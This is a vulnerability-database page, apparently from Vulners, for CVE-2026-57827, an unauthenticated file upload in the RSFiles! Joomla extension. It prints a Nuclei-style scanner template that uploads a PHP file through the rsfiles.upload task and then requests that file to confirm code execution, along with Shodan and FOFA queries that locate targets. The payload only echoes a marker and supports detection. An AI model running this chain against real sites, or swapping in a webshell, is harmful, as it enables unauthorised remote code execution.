RSFiles! for Joomla - Arbitrary File Upload
| Reporter | Title | Published | Views | Family All 11 |
|---|---|---|---|---|
| Exploit for Unrestricted Upload of File with Dangerous Type in Rsjoomla Rsfiles\! | 2 Aug 202608:21 | – | githubexploit | |
| Exploit for Unrestricted Upload of File with Dangerous Type in Rsjoomla Rsfiles\! | 30 Jul 202620:49 | – | githubexploit | |
| Exploit for Unrestricted Upload of File with Dangerous Type in Rsjoomla Rsfiles\! | 29 Jul 202620:19 | – | githubexploit | |
| CVE-2026-57827 | 11 Jul 202609:29 | – | attackerkb | |
| CVE-2026-57827 | 11 Jul 202610:24 | – | circl | |
| CVE-2026-57827 | 11 Jul 202609:29 | – | cve | |
| CVE-2026-57827 Joomla Extension - rsjoomla.com - Unauthenticated file upload in RSFiles component < 1.17.12 | 11 Jul 202609:29 | – | cvelist | |
| EUVD-2026-43168 | 11 Jul 202609:29 | – | euvd | |
| CVE-2026-57827 | 11 Jul 202610:16 | – | nvd | |
| PT-2026-57425 | 11 Jul 202600:00 | – | ptsecurity |
10
id: CVE-2026-57827
info:
name: RSFiles! for Joomla - Arbitrary File Upload
author: omarkurt
severity: critical
description: |
RSFiles! (com_rsfiles) for Joomla < 1.17.12 allows unauthenticated arbitrary file upload via the rsfiles.upload task. The write method performs no authentication, CSRF token, or file extension checks, allowing upload of executable PHP files to the web-accessible downloads/ directory.
impact: |
Unauthenticated remote code execution via PHP webshell upload.
remediation: |
Update RSFiles! to version 1.17.12 or later.
reference:
- https://mysites.guru/blog/rsfiles-unauthenticated-file-upload-rce/
- https://vulnerabletarget.com/VT-2026-57827
- https://www.rsjoomla.com/blog/view/644-unauthenticated-file-upload-fixed-in-rsfiles-version-11712-update-now.html
- https://nvd.nist.gov/vuln/detail/CVE-2026-57827
classification:
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
cvss-score: 9.8
cve-id: CVE-2026-57827
epss-score: 0.00405
epss-percentile: 0.33713
cwe-id: CWE-434
metadata:
verified: true
max-request: 3
vendor: rsjoomla
product: rsfiles
framework: joomla
shodan-query: http.html:"com_rsfiles"
fofa-query: body="com_rsfiles"
tags: cve,cve2026,joomla,rsjoomla,rsfiles,file-upload,rce,intrusive
variables:
marker: "{{to_lower(rand_text_alpha(8))}}"
flow: http(1) && http(2) && http(3)
http:
- raw:
- |
POST /index.php?option=com_rsfiles&task=rsfiles.checkupload HTTP/1.1
Host: {{Hostname}}
Content-Type: application/x-www-form-urlencoded
matchers:
- type: dsl
dsl:
- 'status_code == 200'
- 'contains(body, "\"status\":\"ok\"")'
condition: and
internal: true
- raw:
- |
POST /index.php?option=com_rsfiles&task=rsfiles.upload HTTP/1.1
Host: {{Hostname}}
Content-Type: multipart/form-data; boundary=----RSFilesBoundary57827
------RSFilesBoundary57827
Content-Disposition: form-data; name="file"; filename="{{marker}}.php"
Content-Type: application/x-php
<?php echo 'VT-2026-57827-{{marker}}'; ?>
------RSFilesBoundary57827--
matchers:
- type: dsl
dsl:
- 'status_code == 200'
- 'contains(body, "\"status\":\"success\"")'
condition: and
internal: true
- raw:
- |
GET /downloads/{{marker}}.php HTTP/1.1
Host: {{Hostname}}
matchers:
- type: dsl
dsl:
- 'status_code == 200'
- "contains(body, 'VT-2026-57827-{{marker}}')"
condition: and
# digest: 4b0a00483046022100cad9b7bbbcdfefe03beb8da773d30bd1e7cdfdf4d06dc8c4a23bfe8156b73e69022100d6d6cb82309abad295a5cfe99a9067de51cc351cdef66989c314ecfea5194700:922c64590222798bb761d5b6d8e72950Data
Build on a solid foundation with Vulners data
We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data
Api
Power your application with Vulners API
The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access
App
Assess and manage vulnerabilities with Vulners tools
Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation
07 Aug 2026 12:05Current
5.5Medium risk
Vulners AI Score5.5
CVSS 3.19.8
CVSS 410
EPSS0.00405
SSVC